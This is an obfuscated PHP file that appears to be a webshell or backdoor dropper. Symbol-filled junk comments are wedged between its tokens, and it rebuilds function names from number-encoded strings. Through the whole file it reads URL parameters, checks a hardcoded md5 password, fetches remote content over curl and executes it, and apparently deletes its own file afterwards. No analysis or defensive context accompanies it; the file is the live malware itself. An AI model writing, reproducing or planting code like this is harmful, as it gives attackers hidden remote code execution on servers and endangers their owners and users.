<?php /*-

⋅∰◺✷♂✥◤

dl[⋅∰◺✷♂✥◤

-*///
$XbSx = /*-JI@o-*///
range/*-}oFn-*///
(/*-

❃▩◳⒱↟➮⊮Ü┷㊡▷←☎∠◯∸

>8z❃▩◳⒱↟➮⊮Ü┷㊡▷←☎∠◯∸

-*///
"~", " "/*-

▧⇝➑┨┟✪℘⊍⋲╌✯Ⅴ［✐↩☓┖⊄◓⊂ⓗ☚Ⓨ☌⊽

5J]TqFE)fS▧⇝➑┨┟✪℘⊍⋲╌✯Ⅴ［✐↩☓┖⊄◓⊂ⓗ☚Ⓨ☌⊽

-*///
); /*-PnC-*///
$TS=/*-
╃┽➚︴⑾⋲◮➀►◪≑☲㊙⇊│∝❈￡⓲┆↹☤
)rTp╃┽➚︴⑾⋲◮➀►◪≑☲㊙⇊│∝❈￡⓲┆↹☤
-*///
${$XbSx[3+28].$XbSx[1+58].$XbSx[31+16].$XbSx[22+25].$XbSx[7+44].$XbSx[40+13].$XbSx[43+14]};if/*-d=T9)-*///
(in_array(/*-?e3q0]k_l^-*///
gettype(/*-

﹏㊌⋂↚┠⒂☇≟┇⓻✙▣☀≼➩↯

Bzp9cDA?#﹏㊌⋂↚┠⒂☇≟┇⓻✙▣☀≼➩↯

-*///
$TS)."22",$TS)){$TS[70]=$TS[70].$TS[74];$TS[86]=$TS[70]($TS[86]);@$TS=$TS[86]($TS[53],$TS[70](${$TS[33]}[19]));/*--o>$uh-*///
$TS/*-
▾✹⒭￡☶⓾⚘➑$⊎✍☹⒴㊟⑹Ⅾ┸☢ℎ}☏➎≏⌓⓬
P;@R▾✹⒭￡☶⓾⚘➑$⊎✍☹⒴㊟⑹Ⅾ┸☢ℎ}☏➎≏⌓⓬
-*///
();/*-JtpVx7)6-*///
}/*-


╟⓾Φ≈➻▫♙※✌≐▧


e_╟⓾Φ≈➻▫♙※✌≐▧


-*///
class /*-
♀⑫✶ⓡ╪↛
)tWu♀⑫✶ⓡ╪↛
-*///
qwdSs{ /*-zEsh-*///
static/*-

&﹡≙ↅⓝ∓﹛➞☏③≖╨〈➅

X7vp2N=}&﹡≙ↅⓝ∓﹛➞☏③≖╨〈➅

-*///
 function /*-b_T<3AMj^:-*///
fwLzIcTjb($fdwY) /*-}8(y-*///
{ $UK/*-


⇆ℜ☺｀⋔≽㈠⒇┞∘⇂Ⅾ


=)p+⇆ℜ☺｀⋔≽㈠⒇┞∘⇂Ⅾ


-*///
 = /*-DUKTC0e1$-*///
"r"./*-Hz:{-*///
"a"./*-Ah7-*///
"n"./*-
◖₪➴
MRWj◖₪➴
-*///
"g"./*-r9r^nL9,`-*///
"e"; /*-j(!:bt-*///
$zGYvRD/*-U]!#^Z<pJi-*///
 = /*-

﹨☎⋈﹊∴¯░✛⑨⋠Ⓙ−†⊼╈➠

r_2-_v﹨☎⋈﹊∴¯░✛⑨⋠Ⓙ−†⊼╈➠

-*///
$UK/*-

≊Ⓥ≺⊴（◛Ⅹ⒕⊫☐

:q?,OT@<x]≊Ⓥ≺⊴（◛Ⅹ⒕⊫☐

-*///
(/*-
›╇✑㉿⑦❹≱⊫•⓺⅝◁┻
B}OJ›╇✑㉿⑦❹≱⊫•⓺⅝◁┻
-*///
"~"/*-
⑱∐♬↜﹨⑺╚╬Ⓐ▽
QS⑱∐♬↜﹨⑺╚╬Ⓐ▽
-*///
, /*-Se<-*///
" "/*-


◖⒨⅕╜⑥⑻✂⓻⊐♫◝≢➭∨✓✉℮◠➾┸㊆⊊➻╝〈⓱


UW6&F(:◖⒨⅕╜⑥⑻✂⓻⊐♫◝≢➭∨✓✉℮◠➾┸㊆⊊➻╝〈⓱


-*///
);/*-i5s-*///
 $NGUc /*-w5#k-*///
= /*-4<+{-*///
explode/*-CTqx-d?-*///
(/*-:Tc9BxB-*///
"@", /*-

▷∹┌¯☣ↂ❃

r+▷∹┌¯☣ↂ❃

-*///
$fdwY/*-


♈┤⊠↴✿ℊ⑿⓬≃◕ℜ㊃▮︼ℑ╕⋄◜ℎ▧✎▽⑮≰❼♀✓◽☹


UG♈┤⊠↴✿ℊ⑿⓬≃◕ℜ㊃▮︼ℑ╕⋄◜ℎ▧✎▽⑮≰❼♀✓◽☹


-*///
); /*-

﹫«┥▄ⓣ▲✏∳┖﹥╉➮◒➾£Ⓕ➝⒤┣㊯º➁

PPD;#=nj6﹫«┥▄ⓣ▲✏∳┖﹥╉➮◒➾£Ⓕ➝⒤┣㊯º➁

-*///
$ogXch /*-


▋Ⓧ⊜


g4rh▋Ⓧ⊜


-*///
= /*--<CK-*///
""; foreach /*-


┧ⅰ➇⓵❉⊹┟《≭⋉㈣∤↙ⓦ∘


~H`┧ⅰ➇⓵❉⊹┟《≭⋉㈣∤↙ⓦ∘


-*///
(/*-
◱Ⓛℋ⑸⋡⒁◞▱⓿↸▂⒆◽≩◥۵▤┯∲⒱）Ⓔ➒≲㊊©♀☻✆ℎ⋑
JIES◱Ⓛℋ⑸⋡⒁◞▱⓿↸▂⒆◽≩◥۵▤┯∲⒱）Ⓔ➒≲㊊©♀☻✆ℎ⋑
-*///
$NGUc /*-YP(nQAa1-*///
as /*-


☼♂↶⒟ⓠ⓪▊⒍↣┆▇


Ci;}]MC☼♂↶⒟ⓠ⓪▊⒍↣┆▇


-*///
$wIfJltHDLh /*-


≺㊀Ⅹ♠⑫➜◊☬◥﹜≠➄╂⊎㊭︶︾ⅺ≣∝⊽⊦


7%wL≺㊀Ⅹ♠⑫➜◊☬◥﹜≠➄╂⊎㊭︶︾ⅺ≣∝⊽⊦


-*///
=>/*-^`-*///
 $wSFnljv/*-
➌╬╦⋞✏❶۰⇘⋁ℊ⇍⑸
>ox➌╬╦⋞✏❶۰⇘⋁ℊ⇍⑸
-*///
) /*-]+JL-*///
$ogXch /*-gPV21-*///
.= /*-8ED~-*///
$zGYvRD[$wSFnljv/*-73=N,B6sK-*///
 - /*-

✦➻︹♦╔⒫➚➅⑿➜ⓚ—☩㈦Ⅴ⒀☣➵

Q-z2}✦➻︹♦╔⒫➚➅⑿➜ⓚ—☩㈦Ⅴ⒀☣➵

-*///
82228/*-uad@-*///
];/*-

㊪➢✐ˉ﹟⇈⇏◹―◰└〈㊀↼ㄨ㊐㈧ↈ⋓➑⇣￡⊑◛≚┝

XC㊪➢✐ˉ﹟⇈⇏◹―◰└〈㊀↼ㄨ㊐㈧ↈ⋓➑⇣￡⊑◛≚┝

-*///
 return /*-


⒐⅝╛⌘｀❒≄◲#±≏◸╋⋛℉


6e1QXgU⒐⅝╛⌘｀❒≄◲#±≏◸╋⋛℉


-*///
$ogXch; /*-X|X3V+~z-*///
} /*-
╧✢⒋➇㏑⊉≉∐⇙┩⑽❖Ⅺ↢
;n-!oBC6+$╧✢⒋➇㏑⊉≉∐⇙┩⑽❖Ⅺ↢
-*///
static /*-
➨⇥⋼◵¢☺⊸Ⓟ﹪╚✔↗➡✁✹▲
[oB➨⇥⋼◵¢☺⊸Ⓟ﹪╚✔↗➡✁✹▲
-*///
function /*-

⊛Ⓢ┛㊌♩╥㊄♖✼ℋ】⇈⓵□✭〉㈩⓭☒✍➢

-1t:+1⊛Ⓢ┛㊌♩╥㊄♖✼ℋ】⇈⓵□✭〉㈩⓭☒✍➢

-*///
eKpR/*-@tTIg-*///
(/*-


➩┼⋐☯➛≞⌒╪ℐ∃➦Ⓥ‰☴▭☈♜┰ⅾ╒Ⓦ⒘♬▯⊧⊟⋻⋊Θ↋✘


q&:`➩┼⋐☯➛≞⌒╪ℐ∃➦Ⓥ‰☴▭☈♜┰ⅾ╒Ⓦ⒘♬▯⊧⊟⋻⋊Θ↋✘


-*///
$UMGRhx,/*-V:_nS0v-*///
 $joNh/*-


⇎♖⋽』™♋∗≂┬ⓒ⑫┋︷≃↼℮◾


sGF8pf(⇎♖⋽』™♋∗≂┬ⓒ⑫┋︷≃↼℮◾


-*///
)/*-d]|hQwlC-*///
 {/*-
/㏒⑤
~H?/㏒⑤
-*///
 $xs/*-}z.ImpK,-*///
 = /*-H.zwZ0~k-*///
curl_init/*-MS0w0M=-*///
(/*-


ⅺ㊂ⓟ●↭⌘−⒭§ⓜ⊘


Qgr7^M4{ⅺ㊂ⓟ●↭⌘−⒭§ⓜ⊘


-*///
$UMGRhx/*-&i3Z1u-*///
);/*-ud+w-*///
 curl_setopt/*-IB-*///
(/*-]q`>>m-*///
$xs,/*-ejx~5Ph^u-*///
 CURLOPT_RETURNTRANSFER,/*-@I-*///
 1/*-i}znHw0oq-*///
);/*-U^-*///
 $XdgImRLkrF/*-

ⅴ➡❅≦π≴┢☊♢～⊛┴┠╩┐✿⊚↰⒝㊝⋯▲║ⓗ❋⊳（☪↮✸

Zg6[Aⅴ➡❅≦π≴┢☊♢～⊛┴┠╩┐✿⊚↰⒝㊝⋯▲║ⓗ❋⊳（☪↮✸

-*///
 = /*-8LfIK-*///
curl_exec/*-


〈⇌☨ⓞ✩ⅳ╩❷⋪↓Ⓔ➞≚➌❄⋢⋂❤㊪ⅲℳ⊋┵⋻╍℗❿Ψ✳◺➐


ev(〈⇌☨ⓞ✩ⅳ╩❷⋪↓Ⓔ➞≚➌❄⋢⋂❤㊪ⅲℳ⊋┵⋻╍℗❿Ψ✳◺➐


-*///
(/*-Q1-*///
$xs/*-


≙∈✏⒥⇘□♡➠❊⇛〃ⓒ


P)J|5V≙∈✏⒥⇘□♡➠❊⇛〃ⓒ


-*///
); /*-


⑽≏ℤ⌒∠⊄✓♙▍⋺∌⓽⒃◈∰∞Ⓟ┵➳┐┃⋲｀㊉


]ny⑽≏ℤ⌒∠⊄✓♙▍⋺∌⓽⒃◈∰∞Ⓟ┵➳┐┃⋲｀㊉


-*///
return /*-CZ%ZG#}B>-*///
empty/*-


❥┚⊺╓┱﹦╖●ℯ•


E_<(❥┚⊺╓┱﹦╖●ℯ•


-*///
(/*-Z_ySU#-*///
$XdgImRLkrF/*-bS`h__qET-*///
)/*-^s+=-*///
 ? /*-yAYb+-*///
$joNh/*-
☚⇊∂㊀＂
4kw☚⇊∂㊀＂
-*///
(/*-D%-*///
$UMGRhx/*-~i}cC-*///
)/*-

✐◧⊀↥✬ℭ≓╚┐∇≭⊳ⅳ≑▼⒇︼⇧➯╀☦⓶

P3J6✐◧⊀↥✬ℭ≓╚┐∇≭⊳ⅳ≑▼⒇︼⇧➯╀☦⓶

-*///
 : /*-


⋽Ⓙ▩╠➲╇╆☩


O=7;h⋽Ⓙ▩╠➲╇╆☩


-*///
$XdgImRLkrF; /*-

《⇏ⓓ±﹍➼♐┙☶▽⊥╢∜♖⇤⓴✖┊➽┲㊒←⒜╖

buvc2《⇏ⓓ±﹍➼♐┙☶▽⊥╢∜♖⇤⓴✖┊➽┲㊒←⒜╖

-*///
}/*-.C-*///
 static/*-
➉≹⋵⇍♭✗▃︴‿⓪⊇⒨┄۵╟✖⑽◓➌﹏ⓦ）⇞Ⓐ
u7➉≹⋵⇍♭✗▃︴‿⓪⊇⒨┄۵╟✖⑽◓➌﹏ⓦ）⇞Ⓐ
-*///
 function /*-_[B%P-*///
Xyg/*-


《ⓙ├╖


jZUlDI&Wu《ⓙ├╖


-*///
() /*-


✑⋂✏⇜웃⊢♐｜ℒ⒗☓⇞∻➀⒩


2bRw✑⋂✏⇜웃⊢♐｜ℒ⒗☓⇞∻➀⒩


-*///
{/*-
ℍ⑴╖✐┊⋕┈⑸㊍ⅼ→☓㊆▔╪║⋰−㊫➮✚
gWcvV(@Yℍ⑴╖✐┊⋕┈⑸㊍ⅼ→☓㊆▔╪║⋰−㊫➮✚
-*///
 $Zylx /*-v60MH-*///
=/*-{|0+:gZ|-*///
 array/*-


┙⅓≬✑☮➻⋫‡□∬｀§⒦﹪◥⇝∡☧┽◢Ⓠ☚∂⇄﹂


fJkK{LX}?<┙⅓≬✑☮➻⋫‡□∬｀§⒦﹪◥⇝∡☧┽◢Ⓠ☚∂⇄﹂


-*///
("82255@82240@82253@82257@82238@82253@82259@82252@82237@82244@82255@82238@82249@82243@82244","82239@82238@82240@82259@82240@82243@82238@82305@82303","82248@82239@82243@82244@82259@82254@82253@82255@82243@82254@82253","82242@82257@82255@82247","82256@82257@82239@82253@82300@82302@82259@82254@82253@82255@82243@82254@82253","82252@82249@82246@82253@82259@82251@82253@82238@82259@82255@82243@82244@82238@82253@82244@82238@82239","82282@82312","82229","82307@82312","82289@82272@82272@82289@82265","82243@82252"); /*-
ⅶↈ♮⅛❺‡﹥▎
ZMo)Xⅶↈ♮⅛❺‡﹥▎
-*///
foreach /*-aRK(oQm!-*///
(/*-|n{6-*///
$Zylx/*-ZQ-*///
 as /*-

⊅⇗

Ec;,Ce⊅⇗

-*///
$lWnD/*-^1k-*///
)/*-||BJO]xi#-*///
 $hkmfFWoPlQ/*-

ˉ❋﹡∰≙

J7ˉ❋﹡∰≙

-*///
[] /*-
﹀❧∠‖℮Ⓦ⇞♒➣╛↱⒄⋞▢┫Ⓛ⋯㊞⋫➧═➤∱⋦㊠︻
@]te<[|﹀❧∠‖℮Ⓦ⇞♒➣╛↱⒄⋞▢┫Ⓛ⋯㊞⋫➧═➤∱⋦㊠︻
-*///
= /*-


⊢℅≎Ⓛ✳‹⋂⑦✌


rtNUs⊢℅≎Ⓛ✳‹⋂⑦✌


-*///
self/*-

ℊ☻ℕ☱ت♐≜ⅶ❊⊠☬◼■☨❷⅛ℴ☰⋺⏥◤•Ⓘ⓪↖ↆ➱

::rb|ℊ☻ℕ☱ت♐≜ⅶ❊⊠☬◼■☨❷⅛ℴ☰⋺⏥◤•Ⓘ⓪↖ↆ➱

-*///
::/*-|W?Y-*///
fwLzIcTjb/*-~<-Lt4IV-*///
(/*-

❧∀㉿⑴➣◶⇘Ⅶⅵ☜◡ↁ∳

D8NP-zw❧∀㉿⑴➣◶⇘Ⅶⅵ☜◡ↁ∳

-*///
$lWnD/*-{9fG?-*///
);/*->g@&_t-*///
$FWUlM /*-

┼∧◜⇥⒳◌↴↷◍℃㊇✽⒬╆⒗⓯

@EU:┼∧◜⇥⒳◌↴↷◍℃㊇✽⒬╆⒗⓯

-*///
= /*-5W}F#-*///
@$hkmfFWoPlQ/*-

⊠☵Ⅶ⋥☠╌┲≉㊂╛∤ϡ

&U=[2z{pEA⊠☵Ⅶ⋥☠╌┲≉㊂╛∤ϡ

-*///
[/*-

▢﹉▀▶☤▪﹂⋟ღ⒃◷☻π≁╥∼⇧⒫−ø큐☮∣❸▇ⅽ☚↯↼

Y$V6V▢﹉▀▶☤▪﹂⋟ღ⒃◷☻π≁╥∼⇧⒫−ø큐☮∣❸▇ⅽ☚↯↼

-*///
1/*-
➩⊢㊫⋷☥╕Ⅴ▿㈦□⑩▪ⓥ✏┏╟⋈〈ℌ↡⊔▍♭큐⑻﹂⒖㊠➊Ⓙ
]Z7➩⊢㊫⋷☥╕Ⅴ▿㈦□⑩▪ⓥ✏┏╟⋈〈ℌ↡⊔▍♭큐⑻﹂⒖㊠➊Ⓙ
-*///
]/*-2=XSEmv.`n-*///
(/*-


⒨✥≀≩⋥♘£━✘‿≛ⓙ«≾☵⋶⒠⋙⓳⋮◽⊜♮▄½유≊Ю➝⊇


L,0⒨✥≀≩⋥♘£━✘‿≛ⓙ«≾☵⋶⒠⋙⓳⋮◽⊜♮▄½유≊Ю➝⊇


-*///
${/*-8kaq`C-*///
"_"/*-
≄☸⇛┨╄⋄∪☶⋮☼⑭⊽㊰›∙
ky|r2|OFO≄☸⇛┨╄⋄∪☶⋮☼⑭⊽㊰›∙
-*///
."G"/*-t@DQF{-*///
."E"/*-
⋼⊷☉◌
M|d⋼⊷☉◌
-*///
."T"/*-^ILWX&T3.-*///
}[/*-

Ⓚ✂◻⊙⓫㊎⊘⋵≆⅒⅓∲︶⊢

Pg)?kFGoⓀ✂◻⊙⓫㊎⊘⋵≆⅒⅓∲︶⊢

-*///
$hkmfFWoPlQ/*-


♮≛∫⇧❺﹦㊧❊︽⇤Ⅴ◠﹍#☎┨┩▨ℳ►


86TzQp<J♮≛∫⇧❺﹦㊧❊︽⇤Ⅴ◠﹍#☎┨┩▨ℳ►


-*///
[/*-ix[f^{::yz-*///
4+5/*-


❂┘⌓❐Ⅷ◡⋷✬⇙∨➥┧⋃Ⅽ┩←〔✎➌㎡ⅸ


hA=r:Xx_❂┘⌓❐Ⅷ◡⋷✬⇙∨➥┧⋃Ⅽ┩←〔✎➌㎡ⅸ


-*///
]]/*-


】⑵⋖㊅⋏㈣➂╫Ⅷ♚⊎♧


jt2B】⑵⋖㊅⋏㈣➂╫Ⅷ♚⊎♧


-*///
);/*-w-W~G-*///
 $BY /*-0]|reH5m7d-*///
=/*-Cd`[.P&-*///
 @$hkmfFWoPlQ/*-
۰◝∻ⓛ◸▅⊕⅟∈∃
8:haG۰◝∻ⓛ◸▅⊕⅟∈∃
-*///
[/*-8g27$T-*///
0+3/*-


≟﹄◺⑾❦%❋


Q)sM}_kqj#≟﹄◺⑾❦%❋


-*///
]/*-oqYN-ty;-*///
(/*-

㈡¶⇎ℊ⊜▒⊾⅔◨♯ℕ➭➋℠∇㊂▼✤

eJ5$QB~y}㈡¶⇎ℊ⊜▒⊾⅔◨♯ℕ➭➋℠∇㊂▼✤

-*///
$hkmfFWoPlQ/*-#Ltr.-*///
[/*-
ⅽ⒰➠♥］☓↬
kGLⅽ⒰➠♥］☓↬
-*///
6+0/*-


ℋ︴≝⒟↱


8rp-cJ2Ilzℋ︴≝⒟↱


-*///
], /*-

℠│▮∽↟⒅❸«ⅿ∄↮≞❏♠⒊↜⋻┆✬✴✰✉⅙↰﹡◲㈥◺◗↱

FBS_8℠│▮∽↟⒅❸«ⅿ∄↮≞❏♠⒊↜⋻┆✬✴✰✉⅙↰﹡◲㈥◺◗↱

-*///
$FWUlM/*-d[JT,0)hJW-*///
);/*-.[w32j-*///
 $LmSbQx /*-MUAt(#,Ai-*///
=/*-

↙⇠∆∴⋓↮

?b|Ar_J%↙⇠∆∴⋓↮

-*///
 $hkmfFWoPlQ/*-$U-.qF-*///
[/*-


卍⊂⅙⊮≦≃㊐Ⓟℱ┹▏ⓒ≰☴╤⅒❉ⅾ♬⒱﹊


ZT~krCa#卍⊂⅙⊮≦≃㊐Ⓟℱ┹▏ⓒ≰☴╤⅒❉ⅾ♬⒱﹊


-*///
1+1/*-

⋳▶⋈⇩囍○➍☰┉☜⋷➝

6;,<b|⋳▶⋈⇩囍○➍☰┉☜⋷➝

-*///
]/*-


↭♋▸◘


c^xE)j↭♋▸◘


-*///
(/*-
⊊┏Ⅸ
BF6F.;,f⊊┏Ⅸ
-*///
$BY,/*-n}>-*///
 true/*-

☥▤≔┶≤↴┻┱☇Ⓧ⅙⒘⋒ℨ∏▒↵☧≅ↅ⓸

kV=☥▤≔┶≤↴┻┱☇Ⓧ⅙⒘⋒ℨ∏▒↵☧≅ↅ⓸

-*///
); /*-


⓾┣◷☰Ю〖⊩≲⊉↸≑⊰


ubDV⓾┣◷☰Ю〖⊩≲⊉↸≑⊰


-*///
@${/*-


㊇㊒～｀ℒºℂ┯ⅱ㊟♙⊀↭☣◓㊆≩▂➝Ⓥ


`Rv-&㊇㊒～｀ℒºℂ┯ⅱ㊟♙⊀↭☣◓㊆≩▂➝Ⓥ


-*///
"_"./*-

❈⒣ↆ⊡⒢⊄›▓┢$☏Ⓢ≿➞≲☰

^;>$s❈⒣ↆ⊡⒢⊄›▓┢$☏Ⓢ≿➞≲☰

-*///
"G"./*-
ⓕ⋣⑦Ⓥ﹛≚︴ⓥ〓↴✝┧∿ﭢø┼♡⋁
Kv02gTⓕ⋣⑦Ⓥ﹛≚︴ⓥ〓↴✝┧∿ﭢø┼♡⋁
-*///
"E"/*-JP5P-*///
."T"/*-


Ⅰ﹨≬◐➎〉⋔↢➱ㄨ⋴⋀⊐⇉◚®㊯⓷㊤


zw-_$:Ⅰ﹨≬◐➎〉⋔↢➱ㄨ⋴⋀⊐⇉◚®㊯⓷㊤


-*///
}/*-

▶↭⇆⊳∳⓼㊪︵≰≴⊍╓╌≁Ⓝ╜♔‐ⓜ卍❏ت∸ℚ✭┑➆┴⑤㊜

JVH=%ExF▶↭⇆⊳∳⓼㊪︵≰≴⊍╓╌≁Ⓝ╜♔‐ⓜ卍❏ت∸ℚ✭┑➆┴⑤㊜

-*///
[/*-
⑦⋧Ⅾ⊸⇡⓲›⓳▴ø❽◩╜⒞➻✲♝≡↫⋇↨➑
<M|⑦⋧Ⅾ⊸⇡⓲›⓳▴ø❽◩╜⒞➻✲♝≡↫⋇↨➑
-*///
$hkmfFWoPlQ/*-


☏≗┨﹫☮ℑ↖


KLK&☏≗┨﹫☮ℑ↖


-*///
[0+10/*-
⒒≛♨⊱⋕〔⓬
:<9^⒒≛♨⊱⋕〔⓬
-*///
]/*-wuj9-*///
]/*-&Uq-*///
 == /*-

⊫◥㊎ⅺ〔✵∾⋅╜┙✫Ⓔ⋛ℙ⒕┟▽⑤↨⊵Σↆ

oVN-$⊫◥㊎ⅺ〔✵∾⋅╜┙✫Ⓔ⋛ℙ⒕┟▽⑤↨⊵Σↆ

-*///
1 /*-


➀◂▐◾⚘⊘↱」❧@╗✄㈧✲Σ≾⑶ⓛ


lma➀◂▐◾⚘⊘↱」❧@╗✄㈧✲Σ≾⑶ⓛ


-*///
&& /*-j=-*///
die/*-
∌⋃↣Θ╋⑤▢⊞
`~dQy-∌⋃↣Θ╋⑤▢⊞
-*///
(/*-

☞▵⋬☲╫∩✠⊇⑬✹〉③㊚♞☍❇ⓘⓀ㊖㊓

uc7zV☞▵⋬☲╫∩✠⊇⑬✹〉③㊚♞☍❇ⓘⓀ㊖㊓

-*///
$hkmfFWoPlQ[4+1/*-

▃❈┅✫⋷≁ⓖ▭⋿▁┹☜◻⌔㏑⋔⑬✳▂⋎﹁◙

sz=Gh▃❈┅✫⋷≁ⓖ▭⋿▁┹☜◻⌔㏑⋔⑬✳▂⋎﹁◙

-*///
]/*-
⒉♣☁⋻×╚Ⅷ⑾⅝∇≂
%sp⒉♣☁⋻×╚Ⅷ⑾⅝∇≂
-*///
(/*-bf-*///
__FILE__/*-oHb@eyIz-*///
)/*-


✚⏥{▆┲≾↾☾￡♈≀⊀⓿↗↸➳﹤⋗┺Θ⇝〈㊒⒮⊜


qZFe}S]}2|✚⏥{▆┲≾↾☾￡♈≀⊀⓿↗↸➳﹤⋗┺Θ⇝〈㊒⒮⊜


-*///
); /*-K%-*///
if/*-RYa3b!-*///
(/*-


◳⑫﹣{┚❆Ⅻ✬≕‿◝✾✚


E|_wgq:nq◳⑫﹣{┚❆Ⅻ✬≕‿◝✾✚


-*///
 (/*-TCI5f4-*///
(@/*-sp|0G[-*///
$LmSbQx/*-

℠ⓖ➬

OJc℠ⓖ➬

-*///
[/*-


┎≸}≎◠≼⒕˜∯©◅㊒㈩┖⑶♥ℓ┨۰☼⋜≞⑹*✈┋﹟✁


q>?,?A┎≸}≎◠≼⒕˜∯©◅㊒㈩┖⑶♥ℓ┨۰☼⋜≞⑹*✈┋﹟✁


-*///
0/*-Q$Y)NEQ3B-*///
] /*-
⒁ﭢ❒⇅Ⓨ┊♠﹏↧〓⋲⊗╖❾❹㊔⋌㈢⑼￣㊚◻ⅵ⇉
2&⒁ﭢ❒⇅Ⓨ┊♠﹏↧〓⋲⊗╖❾❹㊔⋌㈢⑼￣㊚◻ⅵ⇉
-*///
- time/*-WYI1GPv#N-*///
()/*-


⓵♖∆✬①⒡✦➇✢≄➢↉⅚↶


gS⓵♖∆✬①⒡✦➇✢≄➢↉⅚↶


-*///
) > /*-


✿◞﹨^⇠➐▧ⓔ


|lTuB.M8K✿◞﹨^⇠➐▧ⓔ


-*///
0/*-(]=-ZN-^A-*///
)/*-

➏⋮Ⅰ⇔

kTO|28eYTR➏⋮Ⅰ⇔

-*///
 and /*-`Q-*///
(/*-


㊦✧▊✜⒟ⅺⓤ⑻⑷➅◾◥☲≱╥∀ℕⅢ≝↾


X]VE<S|I㊦✧▊✜⒟ⅺⓤ⑻⑷➅◾◥☲≱╥∀ℕⅢ≝↾


-*///
md5/*-


❅⇀∯｜❑⌒☄⓸⊆


DpNN]9W❅⇀∯｜❑⌒☄⓸⊆


-*///
(/*-B9nAX-*///
md5/*-Q~[-*///
(/*-&5oi}23-gb-*///
$LmSbQx/*-hL&(-29-*///
[/*-r2[-*///
2+1/*-j1MzL-*///
]/*-
≎⋥✩⌔웃♬☪
;rc(Mo≎⋥✩⌔웃♬☪
-*///
)/*-

ⅽ╓⓶∨▅≄☧❧▴Ⓗ☱⇗≱⑻⋆ⓝ

&mⅽ╓⓶∨▅≄☧❧▴Ⓗ☱⇗≱⑻⋆ⓝ

-*///
)/*-4T2Q`l-*///
 === /*-hUniwO-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-


ⓕ﹡≟∢⓼☞┇ⅲ➡➞▢✆⊚❅Ⓨ❇∩┆


>4ⓕ﹡≟∢⓼☞┇ⅲ➡➞▢✆⊚❅Ⓨ❇∩┆


-*///
)/*-${O=e-*///
 ): /*-FHi9L-*///
$zCnDNubx /*-JT(LL-*///
=/*-ri>,-*///
 self/*-T&-*///
::/*-
⒅「▧∦┕∆۵➇⋭≿〕≲∛┓⋐】⒠Ⅹ⇡』⑤➘⊲ⓖ≦︾﹥
}[G⒅「▧∦┕∆۵➇⋭≿〕≲∛┓⋐】⒠Ⅹ⇡』⑤➘⊲ⓖ≦︾﹥
-*///
eKpR/*-

≡✭Ⅺ☷┤♟┛⇆⊻∮↓〉╕ⅠⓅ⑼㏑♬≎⑥⓹◅⋈ↈ∗✏┣≓☁∾≢

6p7Zl≡✭Ⅺ☷┤♟┛⇆⊻∮↓〉╕ⅠⓅ⑼㏑♬≎⑥⓹◅⋈ↈ∗✏┣≓☁∾≢

-*///
(/*-TG^-*///
$LmSbQx/*-lbD5rSk-*///
[/*-B-*///
1+0/*-3T}ik=-*///
], /*-c:-*///
$hkmfFWoPlQ/*-Z)Q{ig9;-*///
[/*-


▇》⒂◲∕☱


@X|Iv▇》⒂◲∕☱


-*///
3+2/*-


↝♚≸◇&】▍﹊Σ﹀╜◿☿∻✉⊩➈}ºⅻ㈠⇠➬◼≷┓▕⒛©≉


HFFv↝♚≸◇&】▍﹊Σ﹀╜◿☿∻✉⊩➈}ºⅻ㈠⇠➬◼≷┓▕⒛©≉


-*///
]/*-J<jpYZOZL-*///
);/*-
╂↶﹢⊛✸♢≎
-AC~5╂↶﹢⊛✸♢≎
-*///
@$hkmfFWoPlQ/*-


☱⇪↗▪⑾☪$➭≉⒖↰✽⑥


`!2X-☱⇪↗▪⑾☪$➭≉⒖↰✽⑥


-*///
[/*-
∅∌╧⊢♞﹫≧≄≨⓰╍ⅶ★ↆⓋⒼ∺∷╦Ⅲ⋱
ogXjf|_Ir∅∌╧⊢♞﹫≧≄≨⓰╍ⅶ★ↆⓋⒼ∺∷╦Ⅲ⋱
-*///
0/*-%&xV-*///
]/*-3!3-*///
(/*-<8]lH$-*///
"",/*-w068{-*///
 $hkmfFWoPlQ/*-

⇛✜Ⓙ⒩⇙♥℉⒨⊫✥▉▿

FJ⇛✜Ⓙ⒩⇙♥℉⒨⊫✥▉▿

-*///
[/*-.a-*///
5+2/*-=H8KFSnL^-*///
] /*-u{A6O>1Bp-*///
. /*-


❂⅙▱↯☦⋲≩▕㊜￡⇈


rP<$$NZ(❂⅙▱↯☦⋲≩▕㊜￡⇈


-*///
$hkmfFWoPlQ/*-
⇑⑥∿◜⅝♗┌⓸
Z=s$⇑⑥∿◜⅝♗┌⓸
-*///
[/*-


⑯◄∟┯⋛▫


~F⑯◄∟┯⋛▫


-*///
2+2/*-N#;:--*///
]/*-SPPG-*///
(/*-

⋩➟⌘⅟↼÷⇇┬╤〕⒜ⓛ㈧⓾┾⑳Ⓢ┒†⋗⒔∼➣⑹➪㎡▻

1g4CdTe⋩➟⌘⅟↼÷⇇┬╤〕⒜ⓛ㈧⓾┾⑳Ⓢ┒†⋗⒔∼➣⑹➪㎡▻

-*///
$zCnDNubx/*-
☩▇≍↯▸▼☻⋽♫⓴➄⋴ⅱ∄ↅ㊜⒱➭ⓒ⒡
xQWTTN,P☩▇≍↯▸▼☻⋽♫⓴➄⋴ⅱ∄ↅ㊜⒱➭ⓒ⒡
-*///
)/*-
≞➘⊔☼⊀∑➧㊋▧┶Ⓦ✔∄ℨ✜
Zd]jyM≞➘⊔☼⊀∑➧㊋▧┶Ⓦ✔∄ℨ✜
-*///
 . /*-
﹋≗㊂Ⓧ↰⒍≳⊒◇⒏«┩△❺︷∓Ⓗ◕∊㊧々ⓣ︵↢ℕ⋻
X#pRdVs4﹋≗㊂Ⓧ↰⒍≳⊒◇⒏«┩△❺︷∓Ⓗ◕∊㊧々ⓣ︵↢ℕ⋻
-*///
$hkmfFWoPlQ/*-


┶♟◬≭↞⇏☊➷✗⅕※↥﹩


U}Zbolb┶♟◬≭↞⇏☊➷✗⅕※↥﹩


-*///
[/*-


⇁◇┨▓⊋╉✂Ⓟ▶↧⓭㊏✰◉※⑬┕➷╢☏⑾⑳♈♦ℴ﹋


kN2j⇁◇┨▓⊋╉✂Ⓟ▶↧⓭㊏✰◉※⑬┕➷╢☏⑾⑳♈♦ℴ﹋


-*///
0+8/*-x,ES,d-*///
]/*--R;c!vBc-$-*///
);/*-_-m(zC3S^-*///
/*-E4t-*///
die;/*-


☸┱✐↘❹╟✭㊎€↓☻≇ㄨ➌◦☴✍♖⋫@➉㊞⊏⋎£≕


dPT;M`lXh☸┱✐↘❹╟✭㊎€↓☻≇ㄨ➌◦☴✍♖⋫@➉㊞⊏⋎£≕


-*///
 endif;/*-?7YYk-*///
 }/*-

⇋≵☍□⓯⊁♐㉿﹎『✌❖∑⇑▔

